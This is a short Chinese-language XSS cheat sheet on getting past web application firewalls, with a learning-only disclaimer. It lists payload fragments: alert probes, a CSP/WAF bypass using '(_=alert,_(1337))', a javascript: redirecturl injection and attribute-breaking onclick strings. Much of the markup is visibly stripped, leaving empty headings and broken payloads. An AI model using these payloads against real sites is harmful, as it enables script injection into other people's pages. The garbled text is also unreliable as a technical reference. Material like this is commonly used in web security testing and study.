xss绕waf篇
本文仅供学习探讨,切勿用于非法行为。
大型站点测试为了防止影响业务最好不要弹窗,使用console.log输出
XSS弹窗
document.write('
奇奇怪怪的xss
>
无script的xss
引入媒体类测试代码Example:
表单点击测试代码Example:
ByPass
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
link
javascript:/*-->
CSP & WAF Bypass
(_=alert,_(1337)) "">
重定向 测试代码
';redirecturl='javascript:alert("XSS")
';redirecturl='http://google.com/'
Example: www.xyz.com?q="XSS Script"
"/>alert("Xss:Priyanshu")
"/>
"
"><%2Fstyle<%2Fscript>
http://test.com
x">
q=" onclick="alert(/XSS/)
">
欺骗会话
http://localhost/test.php?title=TITLE
data数据流绕过滤